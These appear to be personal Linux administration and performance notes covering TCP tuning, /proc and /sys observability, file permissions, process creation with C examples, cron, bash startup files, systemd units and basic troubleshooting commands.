network manager

  • You can use nm-online to check connectivity status
  • The configuration directory for NetworkManager is at /etc/NetworkManager with the main configuration file being NetworkManager.conf

Networking

TCP

Connections with TCP are established with a 3-way handshake (SYN, SYN-ACK, ACK)

Performance

TCP can provide a high rate of throughput even on a high-latency network, by using buffering and a sliding window. TCP also employs congestion control and a congestion window set by the sender, so that it can maintain a high but also reliable rate of transmission across different and varying networks. Congestion control avoids sending too many packets, which could cause congestion and a performance breakdown.

The following is a summary of TCP performance features:

  • Sliding window: This allows multiple packets up to the size of the window to be sent on the network before acknowledgements are received, providing high throughput even on high-latency networks. The size of the window is advertised by the receiver to indicate how many packets it is willing to receive at that time.
  • Congestion Avoidance: To prevent sending too much data and causing saturation, which can cause packet drops and worse performance.
  • Slow-start: Part of TCP congestion control, this begins with a small congestion window and then increases it as acknowledgements are received within a certain time. When they are not, the congestion window is reduced.
  • Selective acknowledgements (SACKs): Allow TCP to acknowledge discontinuous packets, reducing the number of retransmits required.
  • Fast retransmit: Instead of waiting on a timer, TCP can retransmit dropped packets based on the arrival of duplicate acks. These are a function of round-trip time and not the typically much slower timer.
  • Fast recovery: This recovers TCP performance after detecting duplicate ACKs, by resetting the connection to perform slow-start.
  • TCP Fast Open: Allows a client to include data in a SYN packet, so that server request processing can begin earlier and not wait for the SYN handshake (RFC 7413). This can use a cryptographic cookie to authenticate the client.
  • TCP timestamps: Includes a timestamp for sent packets that is returned in the ACK

Congestion avoidance

Routers, switches, and hosts may drop packets when overwhelmed. There are several mechanisms to avoid these problems:

  • Ethernet: Pause Frames
  • IP: Explicit Congestion Notification (ECN) field
  • TCP: Congestion Window

Jumbo Frames

The confluence of two components has interfered with the adoption of jumbo frames: older hardware and misconfigured firewalls. Older hardware that does not support jumbo frames can either fragment the packet using the IP protocol (causing a performance cost for packet reassembly), or respond with an ICMP “Can’t Fragment” error. Misconfigured firewalls (as a response to an attack known as ‘the ping of death’) have been configured by administrators to block all ICMP traffic.

Latency

Latency can occur at various layers of the HTTP request pipeline:

  • DNS lookup Latency
  • Connection Latency
  • First-byte latency
  • Round-trip time (network latency)
  • Connection Life Span (keepalives or a lack-of)

Buffering

TCP employs buffering, along with a sliding send window, to improve throughput. Network sockets also have buffers, and applications may also employ their own, to aggregate data before sending.

Buffering can also be performed by external network components, such as switches and routers, in an effort to improve their own throughput. Unfortunately, the use of large buffers on these components can lead to bufferbloat, where packets are queued for long intervals. This causes TCP congestion avoidance on the hosts, which throttles performance. Features have been added to Linux 3.x kernels to address this problem (including byte queue limits, the CoDel queueing discipline, and TCP small queues).

The function of buffering may be best served by the endpoints - the hosts - and not the intermediate network nodes.

Connection Backlog

Another type of buffering is for the initial connection requests. TCP implements a backlog, where SYN requests can queue in the kernel before being accepted by the user-land processes. When there are too many TCP connection requests for the process to accept in time, the backlog reaches a limit and SYN packets are dropped, to be later retransmitted by the client. The retransmission of these packets causes latency for the client connect time. The limit is tunable: it is a parameter of the listen syscall, and the kernel may also provide system-wide limits.

Backlog drops and retransmits are indicators of host overload.

Connection Queues in the Linux Kernel

The kernel employs 2 connection queues to handle bursts of inbound connections:

  • One for incomplete connections (the SYN backlog)
  • One for established connections (the listen backlog)

Only one queue was used in earlier versions of the kernel and it was subject to SYN floods

The use of SYN cookies bypasses the first queue, as they show the client is already authenticated.

The length of these queues can be tuned independently. The listen queue can also be set by the application as the backlog argument to the listen(2) syscall, as in the sketch below.
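A minimal sketch of setting the listen backlog from an application (the port number and backlog value are arbitrary; the kernel may clamp the backlog to a system-wide limit such as net.core.somaxconn):

#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) { perror("socket"); return 1; }

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(8080);            // hypothetical port

    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("bind"); return 1; }
    if (listen(fd, 128) < 0) { perror("listen"); return 1; }  // backlog of 128

    // accept(2) calls would drain the established-connection queue here.
    close(fd);
    return 0;
}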

Segmentation Offload

Network devices and networks accept packet sizes up to a maximum segment size (MSS) that may be as small as 1500 bytes. To avoid the network stack overheads of sending many small packets, Linux also uses Generic Segmentation Offload (GSO) to send packets up to 64 kbytes in size (super packets), which are split into MSS-sized segments just before delivery to the network device. If the NIC and driver support TCP segmentation offload (TSO), GSO leaves splitting to the device, improving network stack throughput.

Tools:

  • netstat
  • ping
  • ip
  • ss
  • nicstat
  • tcplife
  • tcptop
  • tcpdump / wireshark
  • perf

Linux Observability Sources

These interfaces provide the data for observability tools on Linux:

  • /proc - per-process counters
  • /proc, /sys - system-wide counters
  • /sys - device configuration and counters
  • /sys/fs/cgroup - cgroup statistics
  • ptrace - per-process tracing
  • perf_event - hardware counters (PMCs)
  • netlink - network statistics
  • libpcap - network packet capture

Various files are provided in /proc for per-process statistics. Here is an example of what may be available for a given PID:

All examples using /proc/18

[root@docker01 ~]# ll /proc/18
dr-xr-xr-x. 2 root root 0 Jan  9 09:24 attr
-rw-r--r--. 1 root root 0 Jan  9 09:24 autogroup
-r--------. 1 root root 0 Jan  9 09:24 auxv
-r--r--r--. 1 root root 0 Jan  9 09:24 cgroup
--w-------. 1 root root 0 Jan  9 09:24 clear_refs
-r--r--r--. 1 root root 0 Jan  7 14:05 cmdline
-rw-r--r--. 1 root root 0 Jan  9 09:24 comm
-rw-r--r--. 1 root root 0 Jan  9 09:24 coredump_filter
-r--r--r--. 1 root root 0 Jan  9 09:24 cpu_resctrl_groups
-r--r--r--. 1 root root 0 Jan  9 09:24 cpuset
lrwxrwxrwx. 1 root root 0 Jan  9 09:24 cwd -> /
-r--------. 1 root root 0 Jan  9 09:24 environ
lrwxrwxrwx. 1 root root 0 Jan  9 09:24 exe
dr-x------. 2 root root 0 Jan  7 14:06 fd
dr-x------. 2 root root 0 Jan  9 09:24 fdinfo
-rw-r--r--. 1 root root 0 Jan  9 09:24 gid_map
-r--------. 1 root root 0 Jan  9 09:24 io
-r--r--r--. 1 root root 0 Jan  9 09:24 limits
-rw-r--r--. 1 root root 0 Jan  9 09:24 loginuid
dr-x------. 2 root root 0 Jan  9 09:24 map_files
-r--r--r--. 1 root root 0 Jan  9 09:24 maps
-rw-------. 1 root root 0 Jan  9 09:24 mem
-r--r--r--. 1 root root 0 Jan  9 09:24 mountinfo
-r--r--r--. 1 root root 0 Jan  9 09:24 mounts
-r--------. 1 root root 0 Jan  9 09:24 mountstats
dr-xr-xr-x. 7 root root 0 Jan  9 09:24 net
dr-x--x--x. 2 root root 0 Jan  7 15:26 ns
-r--r--r--. 1 root root 0 Jan  9 09:24 numa_maps
-rw-r--r--. 1 root root 0 Jan  9 09:24 oom_adj
-r--r--r--. 1 root root 0 Jan  9 09:24 oom_score
-rw-r--r--. 1 root root 0 Jan  9 09:24 oom_score_adj
-r--------. 1 root root 0 Jan  9 09:24 pagemap
-r--------. 1 root root 0 Jan  9 09:24 patch_state
-r--------. 1 root root 0 Jan  9 09:24 personality
-rw-r--r--. 1 root root 0 Jan  9 09:24 projid_map
lrwxrwxrwx. 1 root root 0 Jan  9 09:24 root -> /
-rw-r--r--. 1 root root 0 Jan  9 09:24 sched
-r--r--r--. 1 root root 0 Jan  9 09:24 schedstat
-r--r--r--. 1 root root 0 Jan  9 09:24 sessionid
-rw-r--r--. 1 root root 0 Jan  9 09:24 setgroups
-r--r--r--. 1 root root 0 Jan  9 09:24 smaps
-r--r--r--. 1 root root 0 Jan  9 09:24 smaps_rollup
-r--------. 1 root root 0 Jan  9 09:24 stack
-r--r--r--. 1 root root 0 Jan  7 14:05 stat
-r--r--r--. 1 root root 0 Jan  9 09:24 statm
-r--r--r--. 1 root root 0 Jan  7 14:05 status
-r--------. 1 root root 0 Jan  9 09:24 syscall
dr-xr-xr-x. 3 root root 0 Jan  9 09:24 task
-rw-r--r--. 1 root root 0 Jan  9 09:24 timens_offsets
-r--r--r--. 1 root root 0 Jan  9 09:24 timers
-rw-rw-rw-. 1 root root 0 Jan  9 09:24 timerslack_ns
-rw-r--r--. 1 root root 0 Jan  9 09:24 uid_map
-r--r--r--. 1 root root 0 Jan  9 09:24 wchan

The exact list of files depends on the kernel version and CONFIG options. Those related to per-process performance observability include:

  • limits - in-effect resource limits
  • maps - mapped memory regions
  • sched - various CPU scheduler statistics
  • schedstat - CPU runtime, latency, and time slices
  • smaps - mapped memory regions with usage statistics
  • stat - process status and statistics, including total CPU and memory usage
  • statm - memory usage summary in units of pages
  • status - stat and statm information, labeled
  • fd - directory of file descriptor symlinks
  • cgroup - cgroup membership information
  • task - directory of per-task statistics

/proc also contains system-wide statistics in these directories:

[root@docker01 proc]# ls -Fd /proc [a-z]*
acpi/      bus/     consoles  devices    driver/      filesystems  iomem    kallsyms  key-users    kpagecount  locks    misc     mtrr          partitions   schedstat  slabinfo  swaps          sysvipc/      tty/     vmallocinfo
asound/    cgroups  cpuinfo   diskstats  execdomains  fs/          ioports  kcore     kmsg         kpageflags  mdstat   modules  net@          /proc/       scsi/      softirqs  sys/           thread-self@  uptime   vmstat
buddyinfo  cmdline  crypto    dma        fb           interrupts   irq/     keys      kpagecgroup  loadavg     meminfo  mounts@  pagetypeinfo  sched_debug  self@      stat      sysrq-trigger  timer_list    version  zoneinfo
  • /proc/cpuinfo

    • Description: Contains information about the CPU such as its type, make, model, number of cores, and processing power.
  • /proc/meminfo

    • Description: Provides details on the system’s memory usage including total and available physical memory, swap space, and various other memory parameters.
  • /proc/loadavg

    • Description: Shows the load average of the system, indicating how busy the system is. Displays averages over 1, 5, and 15 minutes.
  • /proc/uptime

    • Description: Indicates how long the system has been running since its last restart.
  • /proc/mounts

    • Description: Lists all the mounts currently in use by the system, similar to the mount command.
  • /proc/net

    • Description: Contains various network-related information including network configuration, statistics, connections, and more.
  • /proc/partitions

    • Description: Shows the partition table of all the storage devices in the system.
  • /proc/cmdline

    • Description: Displays the parameters passed to the kernel at the time it was started.
  • /proc/version

    • Description: Contains information about the version of the Linux kernel, GCC version used for the kernel build, and the build time.
  • /proc/filesystems

    • Description: Lists all the file systems currently supported by the kernel.
  • /proc/sys

    • Description: Contains a collection of interfaces to query and modify kernel parameters at runtime.

/sys

  • Linux provides a sysfs file system, mounted on /sys, which was introduced with the 2.6 kernel to provide a directory based structure for kernel statistics.
  • Netlink is a special socket address family (AF_NETLINK) for fetching kernel information.
  • To use Netlink, open a socket with the AF_NETLINK address family and then use a series of send(2) and recv(2) calls to pass requests and receive information in binary structs (see the sketch after this list).
  • The libnetlink library helps with usage.
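A minimal sketch of the first step, opening and binding an AF_NETLINK socket (using the NETLINK_ROUTE family as an example); actual requests would then be built as nlmsghdr structs and exchanged with send(2)/recv(2):

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>

int main(void) {
    int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (fd < 0) { perror("socket"); return 1; }

    struct sockaddr_nl sa;
    memset(&sa, 0, sizeof(sa));
    sa.nl_family = AF_NETLINK;

    if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("bind"); return 1; }

    // Requests (e.g. an RTM_GETLINK dump) would be sent and received here.
    close(fd);
    return 0;
}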

Tracepoints

  • Tracepoints are a Linux Kernel event source based on static instrumentation.
  • Tracepoints are hard-coded instrumentation points placed at logical locations in kernel code.
  • Available tracepoints can be listed using the perf list tracepoint command
  • Apart from showing when an event happened, tracepoints can also show contextual data about an event.

Pluggable Authentication Modules (PAM)

  • PAM (Pluggable Authentication Modules) is a flexible mechanism for authenticating users and managing authentication-related tasks in Unix-like operating systems.
  • PAM config files are typically stored in /etc/pam.d
  • PAM modules are typically stored in /lib64/security or /lib/security depending on the architecture.
  • PAM configuration files are text files that define how authentication should be handled for various services and applications
  • Each PAM configuration file corresponds to a specific service or application (e.g., login, sshd, sudo) and contains a series of rules that specify which PAM modules to use and how to use them.

Per-Process Analysis

These tools are process-oriented and use counters that the kernel maintains per process:

  1. ps - show process status, various process statistics, including memory and CPU usage
  2. top - Show top processes, sorted by CPU usage or another statistic
  3. pmap - List process memory segments with usage statistics

These tools typically read statistics from the /proc ephemeral file-system.

Permissions

Every Linux file has a set of permissions that determine who can read, write, or execute the file. Running ls -l displays these permissions.

Only the owner of a file or dir can change permissions (the exception is the super user)

Example:

$ ls -l init
-rwxr-xr-x 1 root root 1440152 May  7  2022 init*

-rw-r--r-- 12 root users 12.0K Apr 28 10:10 init
|[-][-][-]-   [--] [---]
||  |  |  |   |    |
||  |  |  |   |    +------> 7. Group
||  |  |  |   +-----------> 6. Owner
||  |  |  +---------------> 5. Alternate Access Method
||  |  +------------------> 4. Others Permissions
||  +---------------------> 3. Group Permissions
|+------------------------> 2. Owner Permissions
+-------------------------> 1. File Type

  1. File Types:
  • -: regular file
  • d: directory
  • l: symbolic link
  • p: pipe
  • s: socket
  • c: character device
  • b: block device
  2. Permissions can be read, write, or execute for user (#2 in text graphic above), group (#3 in text graphic above), and others (#4 in text graphic above)

SUID, GID, Sticky Bit Permissions

SUID

  • SUID = Set UserId bit
  • When the SUID bit is set, the file is executed as the owner of the file, rather than the person running that file
$ touch suidfile
$ ls suidfile
suidfile
$ ll suidfile
-rw-rw-r--. 1 azureadmin azureadmin 0 Aug 28 17:46 suidfile
$ chmod 4660 suidfile
$ ls -l suidfile
-rwSrw----. 1 azureadmin azureadmin 0 Aug 28 17:46 suidfile

Find SUID files: find . -perm /4000

SGID

  • File is executed as the owning group of the file, rather than the person running the file
$ touch sgidfile
$ chmod 2440 sgidfile
$ ll sgidfile
-r--r-S---. 1 azureadmin azureadmin 0 Aug 28 17:49 sgidfile

Find SGID files: find . -perm /2000

Sticky bit

The sticky bit is typically set on public directories to inhibit file erasures by non-owners

ACLs

  • In addition to the standard UGO/RWX permission model, you can also apply ACLs to files and directories
  • ACLs define permissions for named users and named groups
  • ACLs are categorized into two groups, default ACLs and access ACLs
    • Access ACLs are set on individual files and directories
    • Default ACLs can only be applied at the directory level and are inherited by subdirectories and files
  • There are two commands to manage ACLs: getfacl and setfacl. Example: setfacl -m user:mary:rwx /marysFile

processes

threads

In Linux, some processes are divided into pieces called threads. Threads are very similar to processes: they have an identifier, a TID (thread ID), and the kernel schedules and runs threads just like processes. Processes do not usually share memory and I/O connections; threads do. All threads inside a single process share the same system resources.

Many processes have only one thread. A process with only one thread is said to be single-threaded. All processes start out single-threaded. This starting thread is often known as the main thread, and typically corresponds to a 'main' function within a program. The main thread is capable of starting new threads, depending on how the application is written; this is known as multi-threading. Threads can run simultaneously on multiple processors/cores, speeding up computation. Threads also start faster than processes and communicate more efficiently, because threads share memory to communicate amongst themselves, while processes depend on IPC (inter-process communication) calls to communicate.
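A minimal pthreads sketch of a main thread starting a second thread that shares its memory (compile with -pthread):

#include <pthread.h>
#include <stdio.h>

static int shared = 0;   // visible to every thread in the process

static void *worker(void *arg) {
    (void)arg;
    shared = 42;         // no IPC needed: threads share the address space
    return NULL;
}

int main(void) {
    pthread_t tid;
    pthread_create(&tid, NULL, worker, NULL);
    pthread_join(tid, NULL);     // wait for the worker thread to finish
    printf("shared = %d\n", shared);
    return 0;
}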

By default, the output of the `ps` and `top` commands does not show threads, only processes. However, you can modify this behavior:

ryan:// $ ps m |grep httping -A10
1121895 pts/1    -      0:00 httping -delay 2 www.google.com
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -

This is an example of a multi-threaded program (httping). The top line with the PID represents the process, and each line below represents a thread within the process.

adjusting process priority

You can change the way the kernel allocates CPU time to a process, relative to other processes. The kernel runs each process according to its scheduling priority, known as its `nice` value. This can be a value in the range -20 to +19, with -20 being the highest priority. You can see this value for each process using `top` (the NI column). A regular user can only set nice values between 0 and 19; anything below 0 must be set by a superuser. Child processes inherit the nice value of their parent. Use `ps -l` or `ps -lax` to view the niceness of a process.

use `renice` to change the niceness value of an *existing* process:

[ryan@nebula /]# renice -n 11 83883
83883 (process ID) old priority 10, new priority 11
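The same adjustment can be made from inside a program with setpriority(2), a small sketch (the nice value 11 is arbitrary; lowering the value below 0 still requires privileges):

#include <stdio.h>
#include <sys/resource.h>

int main(void) {
    // PRIO_PROCESS with pid 0 targets the calling process.
    if (setpriority(PRIO_PROCESS, 0, 11) != 0)
        perror("setpriority");

    int nice_now = getpriority(PRIO_PROCESS, 0);   // read the nice value back
    printf("current nice value: %d\n", nice_now);
    return 0;
}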

Context Switching

The OS performs context switching, or swapping process state on the CPU, as the primary mechanism behind multiprogramming (or time sharing). There are two main steps to context switching:

1) The OS saves the context of the current process running on the CPU, including all of its register values (PC, stack pointers, general-purpose registers, condition codes, etc.), its memory state, and some other state (open files, etc.).
2) The OS restores the saved context of another process on the CPU and starts the CPU running this other process, continuing its execution from the instruction where it left off.

Process State

In multiprogrammed systems, the OS must track and manage the multiple processes existing in the system at any given time. The OS maintains information about each process, including:

1) The process ID (PID)
2) The address space information for the process
3) The execution state of the process (CPU register values, stack location, etc.)
4) The set of resources allocated to the process (open files)
5) The current process state (ready, running, blocked, exited):
   1) Ready - the process could run on the CPU but is not currently scheduled
   2) Running - the process is scheduled on the CPU and is actively executing
   3) Blocked - the process is waiting for some event before it can continue executing (e.g., waiting for data to be read from disk)
   4) Exited - the process has exited but has not yet been cleaned up

Creating Processes

In Unix, the fork system call is used to create a new process. The process calling fork is the parent process and the new process is the child process. When fork() returns, the program must determine whether it is the parent or the child (by checking fork()’s return value: 0 in the child, the child’s PID in the parent) and then decide how to proceed. If you want concurrency in your program, calling fork() is enough. However, to run a different image, the child process must call exec() (or one of its variants). After calling fork(), the program counter for both the parent and the child is the same. Once exec() is called, the parent’s program image is wiped from the child’s address space and replaced with the new one, as in the sketch below.
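A minimal fork()/exec() sketch; the command run by the child (ls -l) is just an example:

#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void) {
    pid_t pid = fork();

    if (pid == 0) {
        // Child: same program image as the parent until exec() replaces it.
        execlp("ls", "ls", "-l", (char *)NULL);
        perror("execlp");             // only reached if exec fails
        return 1;
    } else if (pid > 0) {
        waitpid(pid, NULL, 0);        // parent: wait for the child to finish
        printf("child %d finished\n", (int)pid);
    } else {
        perror("fork");
        return 1;
    }
    return 0;
}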

Process Descriptors

Linux maintains a process descriptor, a structure in which the Linux kernel keeps information about a single process. It contains all the information needed by the scheduler to maintain the process state machine.

Scheduled Tasks

Cron

  • To add a cron job, add it to your crontab file by running crontab -e in a shell

  • To see an example of a crontab, you can view /etc/crontab

  • Example cronjob structure:

      # Example of job definition:
      # .---------------- minute (0 - 59)
      # |  .------------- hour (0 - 23)
      # |  |  .---------- day of month (1 - 31)
      # |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
      # |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
      # |  |  |  |  |
      # *  *  *  *  * user-name command to be executed
      17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
      25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
      47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
      52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
      #
    
  • Each user can have their own crontab file. These files are usually stored in /var/spool/cron/crontabs

  • To edit and install a crontab, run crontab -e

  • To list your crontabs, run crontab -l

  • To remove a crontab, you can run crontab -r

  • The /etc/crontab file is the system-wide crontab.
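
As an illustration, a hypothetical entry for a user crontab (installed with crontab -e, so there is no user-name field) that runs a backup script every night at 2:00 AM; the script path and log location are made up:

0 2 * * * /usr/local/bin/backup.sh >> /tmp/backup.log 2>&1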

Bash Startup Files

In bash, you can choose from one of 4 startup files to place configuration you want to run at user login: 1) .bash_profile 2) .profile 3) .bash_login 4) .bashrc

Which one should you use?

It’s recommended that you have a single .bashrc file with a symbolic link for .bash_profile pointing to the .bashrc file.
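
A minimal sketch of that setup, assuming all of your configuration lives in ~/.bashrc:

ln -sf ~/.bashrc ~/.bash_profile    # login shells now pick up the same config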

Login Shells

A login shell is typically what you get when you first log in to a system. The same is true when you ssh to a system. You can tell whether you are in a login shell by typing echo $0 at the prompt: if the response starts with a dash (for example, -bash), you are in a login shell. The basic idea is that the login shell is the initial shell. When bash runs as a login shell, it runs /etc/profile, a global profile file that applies to every user. It then looks for one of the four user-specific profile files mentioned above and runs the first one that it finds.
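
For example, in an ssh session (output will vary by system and shell):

$ echo $0
-bash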

Non-login shells

Graphical user environments such as GNOME start up non-login shells, unless you specifically ask for a login shell. Upon starting a non-login shell, bash runs /etc/bash.bashrc and then the user's .bashrc

Troubleshooting Storage

  • Disk I/O can be observed using biosnoop

System Calls

  • The kernel implements a programming interface for users of the system called the ‘system call’ interface. Users and programs interact with the OS through its system call interface.

Common System Calls

fork

  • fork - Used to create a process. At the time of the fork, the child process inherits its execution state from the parent. This execution state includes the parent's address space contents, CPU register values, and any system resources it has allocated. The OS also creates a new process control struct (task struct), an OS data structure for managing the child process, and it assigns the child process a PID.
  • When the child process is first scheduled to run on the CPU, it starts executing where the parent process left off, at the return from the fork call.
  • From a programmer's point of view, a call to fork returns twice: once in the context of the running parent process, and once in the context of the running child process. In order to differentiate the two, fork returns different values to the parent and child. The value returned to the parent is the PID of the child (or -1 if the fork fails), and the value returned to the child is always 0.
  • Example fork code:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
    // after this call there are two processes
    // running the same program
    fork();

    printf("Hello world!\n");
    return 0;
}

exec

  • exec - Unix provides a family of exec system calls that trigger the OS to overlay the calling process’s image with a new image from a binary executable file.
  • Example:
#include <unistd.h>
 
int main(void) {
  char *programName = "ls";
  char *args[] = {programName, "-lh", "/home", NULL};
 
  execvp(programName, args);
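  // note: execvp() only returns if it failed to load the new program image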
 
  return 0;
}

exit and wait

  • exit - to terminate, a process calls the exit syscall, which triggers the OS to clean up most of the process's execution state. After running the exit code, a process notifies its parent that it has exited. The parent is responsible for cleaning up the child's remaining state from the system.
  • After executing the exit syscall, the OS delivers a SIGCHLD signal to the process's parent to notify it that its child has exited. The child then becomes a zombie process; it moves to the Exited state and can no longer run on the CPU. The execution state of a zombie process is mostly cleaned up, but the OS still maintains a little information about it, including how it terminated. A parent process reaps its zombie child by calling the wait syscall.

System Wide Analysis

These tools provide system-wide analysis of software and hardware resources, using kernel counters:

  1. vmstat - virtual and physical memory statistics
  2. mpstat - per-cpu usage
  3. iostat - Per-disk I/O usage, reported from the block device interface
  4. nstat - TCP/IP stack statistics
  5. sar - various statistics; can also archive them for historical reporting

Systemd

  • systemd is goal-oriented. These goals are defined as ‘units’

  • Units are systemd objects used for organizing boot and maintenance tasks. Units consist of mounts, services, sockets, devices, and timers, etc.

  • There are 11 unit types

    • Service units tell the init system what it needs to know about the life cycle of an application
    • systemd is the init system typically
    • Use systemctl cat sshd.service to view the unit file for a service
    • Use systemctl edit --full sshd.service to edit a unit file
    • use systemctl revert sshd.service to revert the unit file to the default
  • To prevent a service from being started, you can mask it

    • systemctl mask sshd.service
  • Targets are simply logical collections of units.

    • Target files end in the .target extension.

    • Systemd includes several predefined targets:

      • halt: shuts down and halts the system
      • poweroff: shuts down and powers off the system
      • shutdown: shuts down the system
      • rescue: boots into single user mode for recovery. All local file systems are mounted. Networking is disabled. Some essential services are started
      • emergency: Runs an emergency shell. The root file system is mounted in read-only mode, other file systems are not mounted. Network and other services are disabled
      • multi-user: full network support, but without a GUI
      • graphical: full network support with a GUI
      • reboot: shuts down and reboots the system
      • default: a special soft link that points to the default system boot target (multi-user or graphical)
      • hibernate: Puts the system into hibernation
    • systemctl get-default will show you the default target

    • use systemctl set-default multi-user.target to set the default operating mode, then reboot

    • Useful targets:

    • emergency.target = root file system is read-only. Minimal amount of programs loaded

    • rescue.target = a few services are loaded and you are dropped into a root shell

      • You must have a password set for the root user to use either of these operating modes
    • You can switch to a target without booting by typing systemctl isolate graphical.target, but this does not change the default boot target

  • Each unit has its own config file

  • When you boot a system, you’re activating a default unit, usually a target unit called default.target that groups together a number of service and mount units as dependencies.

  • There are two main directories that store systemd unit files:

    • /lib/systemd/system or /usr/lib/systemd/system - system unit directory (avoid making changes here; the operating system maintains these files for you)
    • /etc/systemd/system - system configuration directory (make changes here)
    • You can check the current systemd configuration search path with this command: systemctl -p UnitPath show
  • You can interact with systemd using the systemctl command

  • One of systemd's features is the ability to delay a daemon's startup until it is absolutely needed

  • While upgrading software, if systemd’s components are upgraded, you will typically need to reboot

Systemd example

Let’s create a simple echo service

First, define a socket (create a file named echo.socket in /etc/systemd/system):

[Unit]
Description=my echo socket

[Socket]
ListenStream=8081
Accept=true

Next, define a service for echoing a response (create a file named echo@.service in /etc/systemd/system):

[Unit]
Description=my echo service

[Service]
ExecStart=/bin/cat
StandardInput=socket

Now, we need to start the socket we created in step 1.

systemctl start echo.socket

We can get the status of our socket:

ryan:system/ $ sudo systemctl status echo.socket
● echo.socket - my echo socket
     Loaded: loaded (/etc/systemd/system/echo.socket; static)
     Active: active (listening) since Tue 2023-01-17 06:02:51 EST; 7s ago
     Listen: [::]:8081 (Stream)
   Accepted: 0; Connected: 0;
      Tasks: 0 (limit: 38033)
     Memory: 8.0K
        CPU: 911us
     CGroup: /system.slice/echo.socket

Jan 17 06:02:51 xerxes systemd[1]: Listening on my echo socket.

Now you can connect to the socket and see it repeat whatever you say!

ryan:system/ $ nc localhost 8081
hello
hello
nice day, isn't it?
nice day, isn't it?

The first 60 seconds

  1. uptime - load averages, to identify whether load is increasing or decreasing over the 1-, 5-, and 15-minute averages
  2. dmesg -T | tail - kernel errors, including OOM events
  3. vmstat -SM 1 - system-wide statistics: run queue length, swapping, overall CPU usage
  4. mpstat -P ALL 1 - per-CPU balance: a single busy CPU can indicate poor thread scaling
  5. pidstat 1 - per-process CPU usage: identify unexpected CPU consumers, and user/system CPU time for each process
  6. iostat -sxz 1 - disk I/O statistics: IOPS and throughput, average wait time, percent busy
  7. free -m - memory usage, including the file system cache
  8. sar -n DEV 1 - network device I/O: packets and throughput
  9. sar -n TCP,ETCP 1 - TCP statistics: connection rates, retransmits
  10. top - check the overview

time

System time and the hardware clock

  • The kernel maintains the system clock, which is the clock that is consulted when you run commands like date. You can also update the system clock using the date command. However, you shouldn’t as you will never get the time exactly right.
  • PC hardware has a battery-backed Real Time Clock (RTC). The kernel usually sets its time based on the RTC at boot. You can reset the system time to the current time of the RTC using hwclock. Keep your hardware clock in UTC to avoid trouble with time zones or daylight saving time. You can set the RTC from the kernel's UTC clock using this command: hwclock --systohc --utc
  • The kernel is not very good at keeping time on its own. Because Linux systems can go days, months, or even years on a single boot, they typically experience time drift. Because of this, you should configure the system clock to use NTP.
  • The kernel's system clock represents the current time as the number of seconds since midnight, January 1st, 1970 UTC (the Unix epoch). To see this number right now, run date +%s
  • The time zone files on your system are in /usr/share/zoneinfo
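
For example, you can see which zoneinfo file your system is using; on most modern distros /etc/localtime is a symlink into that directory:

ls -l /etc/localtime    # typically points at /usr/share/zoneinfo/<Region>/<City>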

Network Time Protocol (NTP)

  • NTP client services were once handled by a standalone NTP daemon, but systemd has long since replaced this with a service named systemd-timesyncd.
  • timesyncd can be controlled using /etc/systemd/timesyncd.conf
  • If your machine does not have a persistent internet connection, you can use a daemon like chronyd to maintain the time during disconnects
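
On systemd-based distros, a couple of commands worth knowing for checking and enabling time synchronization (availability may vary by distro):

timedatectl                      # current time, time zone, and NTP sync status
sudo timedatectl set-ntp true    # enable systemd-timesyncd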

troubleshooting

Measure CPU time of a process

We can measure CPU time using time. Be aware that there are two implementations of time, and you may be running the wrong one. There is a version of time built into bash (a shell keyword), which does not provide extensive statistics. You want the time utility at /usr/bin/time. Run type time to see which one you will get.

ryan:// $ time httping -delay 2 www.google.com
Time				Count	Url				Result		Time		Headers
-----				-----	---				------		----		-------
[ 2023-01-21T09:29:49-05:00 ]	[ 0 ]	[ https://www.google.com ]	[ 200 OK ]	[ 136ms ]	[  :  ]
[ 2023-01-21T09:29:52-05:00 ]	[ 1 ]	[ https://www.google.com ]	[ 200 OK ]	[ 111ms ]	[  :  ]
[ 2023-01-21T09:29:54-05:00 ]	[ 2 ]	[ https://www.google.com ]	[ 200 OK ]	[ 105ms ]	[  :  ]
^C
Total Requests: 2

real	0m6.384s
user	0m0.000s
sys	0m0.021s
  • Real time - the total wall-clock time the application spent running. This is user time + system (kernel) time + time spent waiting (the process could be waiting on various things: CPU time, network resources, etc.)
  • User time - represents the time the CPU spent running the program itself
  • Sys time - represents the time the Kernel spent doing the process’s work (for example, reading files and directories)

You can determine how much time the process spent waiting by subtracting the user and sys times from the real time: real - (user + sys) = time waiting. In the example above, 6.384 - (0.000 + 0.021) ≈ 6.36 seconds were spent waiting, in this case on network resources.

Measuring and troubleshooting load average

You can use uptime to get the overall load average of the system:

ryan:wc/ $ uptime
 09:43:44 up 5 days,  4:34,  1 user,  load average: 0.27, 0.36, 0.29
                                                       ^     ^     ^
                                                       |     |     |
                                                       |     |     -- 15 minutes
                                                       |     --------- 5 minutes
                                                       --------------- 1 minute

uptime shows the overall time since the last reboot. It also shows load averages over 1 minute, 5 minutes, and 15 minutes, respectively.

